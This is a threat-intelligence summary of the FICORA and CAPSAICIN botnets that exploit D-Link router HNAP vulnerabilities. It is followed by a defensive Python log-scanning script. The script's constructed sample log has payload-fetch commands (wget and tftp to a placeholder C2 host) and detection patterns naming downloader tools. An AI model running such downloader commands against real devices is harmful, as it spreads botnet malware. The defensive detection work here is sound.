| Category | Details |
|---|---|
| Threat Actors | Botnet operators using Mirai variant (FICORA) and Kaiten variant (CAPSAICIN). |
| Campaign Overview | Surge in botnet attacks leveraging D-Link router vulnerabilities; FICORA targeting globally, CAPSAICIN focusing on East Asia (Japan, Taiwan). CAPSAICIN particularly active on Oct 21–22, 2024. |
| Target Regions | FICORA: Global; CAPSAICIN: East Asia (Japan, Taiwan). |
| Methodology | Exploits vulnerabilities in D-Link routers (via the HNAP interface), brute-force credential attacks, downloader scripts, and C2 communication for executing commands. |
| Products Targeted | D-Link routers, Linux-based systems. |
| Malware Reference | FICORA (Mirai variant) and CAPSAICIN (Kaiten variant). |
| Tools Used | Commands like wget, ftpget, curl, tftp for downloading payloads; brute-force attack functions; malicious scripts ("multi" and "bins.sh"). |
| Vulnerabilities Exploited | HNAP weaknesses in D-Link routers (CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, CVE-2024-33112). |
| TTPs | Exploiting unpatched vulnerabilities, brute-force login attempts, killing rival botnet processes, leveraging DDoS techniques (UDP, TCP, DNS), maintaining persistence, and interacting with C2 servers. |
| Attribution | Botnet campaigns targeting vulnerable D-Link routers and leveraging decade-old vulnerabilities. |
| Recommendations | Regularly update router firmware and kernels, patch known vulnerabilities, use comprehensive monitoring, and implement strict access controls. |
| Source | The Hacker News |
Read full article: https://thehackernews.com/2024/12/ficora-and-kaiten-botnets-exploit-old-d.html
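The summary above names two observable behaviours a defender can look for at the router's edge: HNAP requests that carry download-tool commands or the dropper script names ("multi", "bins.sh"), and repeated failed logins from one source. The following Python is an added example, not code from the article or from either botnet's analysis; it runs two simple detections over constructed access-log lines (a Combined-Log-Format line with one extra quoted field for the request body, an assumed layout) and assumes placeholder addresses only.

```python
import re
from collections import Counter
from dataclasses import dataclass, field

# Request body is assumed to be logged as a trailing quoted field (constructed format).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+ "(?P<body>[^"]*)"$'
)
HNAP_PATH = re.compile(r"/HNAP1/?", re.IGNORECASE)
# Download tools listed in the summary's "Tools Used" row.
DOWNLOADER = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)
# Dropper script names listed in the summary.
SCRIPT_NAMES = re.compile(r"\b(bins\.sh|multi)\b")


@dataclass
class Finding:
    line_no: int
    src_ip: str
    timestamp: str
    reasons: list = field(default_factory=list)


def analyze_hnap(lines):
    """Flag HNAP requests whose URL or body carries downloader commands or dropper names."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m or not HNAP_PATH.search(m["path"]):
            continue  # skip unparsable lines and non-HNAP traffic
        text = m["path"] + " " + m["body"]
        reasons = []
        if DOWNLOADER.search(text):
            reasons.append("download tool in HNAP request")
        if SCRIPT_NAMES.search(text):
            reasons.append("known dropper script name")
        if reasons:
            findings.append(Finding(n, m["ip"], m["ts"], reasons))
    return findings


def brute_force_sources(lines, threshold=5):
    """Return {src_ip: failed_logins} for sources with >= threshold HTTP 401 responses."""
    failures = Counter()
    for line in lines:
        m = LOG_LINE.match(line)
        if m and m["status"] == "401":
            failures[m["ip"]] += 1
    return {ip: count for ip, count in failures.items() if count >= threshold}


# Constructed sample log; addresses are documentation ranges and an .invalid host.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Oct/2024:10:01:02 +0000] "POST /HNAP1/ HTTP/1.1" 200 512 "Login"',
    '203.0.113.7 - - [21/Oct/2024:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-"',
    '198.51.100.9 - - [21/Oct/2024:10:02:15 +0000] "POST /HNAP1/ HTTP/1.1" 200 512 '
    '"wget http://c2.example.invalid/bins.sh"',
    '198.51.100.9 - - [21/Oct/2024:10:02:16 +0000] "POST /HNAP1/ HTTP/1.1" 200 512 '
    '"tftp c2.example.invalid -c get multi"',
] + [
    f'192.0.2.44 - - [21/Oct/2024:10:05:{s:02d} +0000] "POST /login.cgi HTTP/1.1" 401 0 "-"'
    for s in range(6)
]

if __name__ == "__main__":
    for f in analyze_hnap(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.src_ip} at {f.timestamp}: {', '.join(f.reasons)}")
    for ip, count in brute_force_sources(SAMPLE_LOG).items():
        print(f"{ip}: {count} failed logins")
```

The benign HNAP login on the first line is not flagged, because the rule keys on the downloader and script indicators rather than on HNAP traffic itself; a router that legitimately uses HNAP for management will otherwise generate constant noise. Thresholds and the body-logging assumption should be adjusted to whatever the local reverse proxy or router actually records.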
The above summary has been generated by an AI language model